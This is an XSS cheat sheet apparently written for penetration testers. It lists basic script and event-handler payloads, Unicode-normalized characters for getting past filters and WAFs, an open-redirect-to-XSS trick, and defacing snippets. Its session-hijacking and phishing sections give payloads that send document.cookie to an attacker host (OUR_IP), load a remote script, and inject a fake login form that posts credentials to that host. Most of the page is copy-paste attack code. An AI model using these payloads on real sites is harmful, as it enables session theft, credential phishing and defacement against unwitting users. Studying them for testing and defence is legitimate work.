Cross Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. XSS normally allows an attacker to masquerade as a victim user, carrying out any actions that the user is able to perform and accessing any of the user's data. Source: https://portswigger.net/web-security/cross-site-scripting


XSS Useful References

Awesome labs to train your XSS skills: https://xssy.uk/


XSS Tools


Basic XSS Payloads

CodeDescription

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us


XSS Filter Evasion - Unicode Normalization

Unicode normalization is a process that ensures different binary representations of characters are standardized to the same binary value. This process is crucial in dealing with strings in programming and data processing

Depending on how the back-end/front-end is behaving when it receives weird unicode characters an attacker might be able to bypass protections and inject arbitrary characters. Indeed, sometimes, unicode normalization even allows bypassing WAFs in place.

You can find find a great article about this topic here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/

Two lists of unicode normalized characters can be found at:

I made a tool to help converting characters to their corresponding unicode normalized value, which I suggest to anyone. You can find my helper tool to perform Unicode Normalization here: https://github.com/alessio-romano/UniXSS

If you prefer, you can also find a list of copy-paste unicode normalized characters below:

CharacterUnicode Normalization

<

%EF%BC%9C

>

%EF%BC%9E

%e2%89%ae

&#x226e;

%ef%b9%a4 &#xfe64;

%ef%bc%9c &#xff1c;

%e2%89%af &#x226f;

%ef%b9%a5 &#xfe65;

%ef%bc%9e &#xff1e;

'

%ef%bc%87

"

%ef%bc%82

=

%e2%81%bc

/

%ef%bc%8f

Open Redirect to XSS

Whenever you are facing a web application which is vulnerable to Open Redirects, it might also be the case that the same vector can be used to gain XSS.

An example might be a website which allows for open redirects by leveraging a GET parameter, such as the following: vulnerable.com/test.php?redirect_url={value}

Instead of using the standard http or https protocols followed by your attacker website, you might insert a javascript payload as the value of the redirect_url parameter. For example, you could navigate to the following URL to pop an alert: vulnerable.com/test.php?redirect_url=javascript:alert(document.domain)


XSS Session Hijacking

  • Use the following XSS Payload: <script src=http://OUR_IP/script.js></script>

  • On the attacker machine, write one of the following payload inside a file named script.js:

    1. new Image().src='http://OUR_IP/index.php?c='+document.cookie

    2. document.location='http://OUR_IP/index.php?c='+document.cookie;


XSS Phishing

  • A common form of XSS phishing is obtained with stored XSS

  • The attacker can inject a fake login form that sends the credentials to an attacker's server,

  • To perform a Stored XSS phishing attack, we must inject an HTML code that displays a login form on the targeted page.

  • An example of such login form is the following (Note: Change OUR_IP in the payload)

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

XSS Defacing

  • Defacing means changing the website's appearance for anyone who visits the website

  • The website's appearance can be changed using injected Javascript code

  • Note: This requires a stored XSS Vulnerability

Defacing PayloadDescription

<script>document.body.style.background = "#141d2b"</script>

Change website background color

<script>document.body.background = "https://example.com/images/logo.svg"</script>

Change website background image

<script>document.title = 'New Title'</script>

Change website title

document.getElementById("todo").innerHTML = "New Text"

Change HTML element/DOM text using innerHTML

Last updated